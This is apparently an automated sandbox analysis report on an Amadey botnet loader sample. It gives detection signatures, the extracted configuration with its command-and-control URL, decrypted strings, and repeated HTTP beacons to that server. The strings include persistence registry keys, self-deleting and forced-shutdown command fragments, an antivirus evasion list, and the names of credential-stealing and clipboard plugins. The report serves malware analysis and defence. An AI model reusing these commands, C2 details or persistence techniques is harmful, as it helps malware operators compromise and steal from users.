Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6uHfmjGMfL.exe

Overview

General Information

Sample name:6uHfmjGMfL.exe
renamed because original name is a hash value
Original sample name:89796a9b6072d2334db09c8b41a64c57.exe
Analysis ID:1585768
MD5:89796a9b6072d2334db09c8b41a64c57
SHA1:bb0e78329ec39982aa2b3b4064375a534170aa43
SHA256:c847c70bdc3eecede3b89f4d7c88ad538271ea92fcfc3e6bb2ea6e22b83d4d61
Tags:exeuser-abuse_ch
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 6uHfmjGMfL.exe (PID: 3868 cmdline: "C:\Users\user\Desktop\6uHfmjGMfL.exe" MD5: 89796A9B6072D2334DB09C8B41A64C57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "clientservices.sgoogleapis.observer/api/index.php", "Version": "5.12", "Install Folder": "a9117c48af", "Install File": "Gxtuum.exe"}
SourceRuleDescriptionAuthorStrings
6uHfmjGMfL.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_Amadey_4Yara detected AmadeyJoe Security
      SourceRuleDescriptionAuthorStrings
      0.0.6uHfmjGMfL.exe.cb0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        0.2.6uHfmjGMfL.exe.cb0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-08T08:44:05.634067+010028561471A Network Trojan was detected192.168.2.549708104.21.80.180TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 6uHfmjGMfL.exeMalware Configuration Extractor: Amadey {"C2 url": "clientservices.sgoogleapis.observer/api/index.php", "Version": "5.12", "Install Folder": "a9117c48af", "Install File": "Gxtuum.exe"}
          Source: 6uHfmjGMfL.exeVirustotal: Detection: 55%Perma Link
          Source: 6uHfmjGMfL.exeReversingLabs: Detection: 63%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: 6uHfmjGMfL.exeJoe Sandbox ML: detected
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: clientservices.sgoogleapis.observer
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: /api/index.php
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: S-%lu-
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: a9117c48af
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Gxtuum.exe
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Startup
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: cmd /C RMDIR /s/q
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: rundll32
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Programs
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: %USERPROFILE%
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: cred.dll|clip.dll|
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: cred.dll
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: clip.dll
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: http://
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: https://
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: /quiet
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: /Plugins/
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: &unit=
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: shell32.dll
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: kernel32.dll
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: GetNativeSystemInfo
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: ProgramData\
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: AVAST Software
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Kaspersky Lab
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Panda Security
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Doctor Web
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: 360TotalSecurity
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Bitdefender
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Norton
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Sophos
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Comodo
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: WinDefender
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: 0123456789
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: ------
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: ?scr=1
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: ComputerName
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: -unicode-
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: VideoID
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: DefaultSettings.XResolution
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: DefaultSettings.YResolution
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: ProductName
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: CurrentBuild
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: rundll32.exe
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: "taskkill /f /im "
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: " && timeout 1 && del
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: && Exit"
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: " && ren
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Powershell.exe
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: -executionpolicy remotesigned -File "
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: shutdown -s -t 0
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: random
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: Keyboard Layout\Preload
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: 00000419
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: 00000422
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: 00000423
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: 0000043f
          Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString decryptor: R9}*Y"
          Source: 6uHfmjGMfL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 6uHfmjGMfL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CEF0C1 FindFirstFileExW,0_2_00CEF0C1

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49708 -> 104.21.80.1:80
          Source: Malware configuration extractorURLs: clientservices.sgoogleapis.observer/api/index.php
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
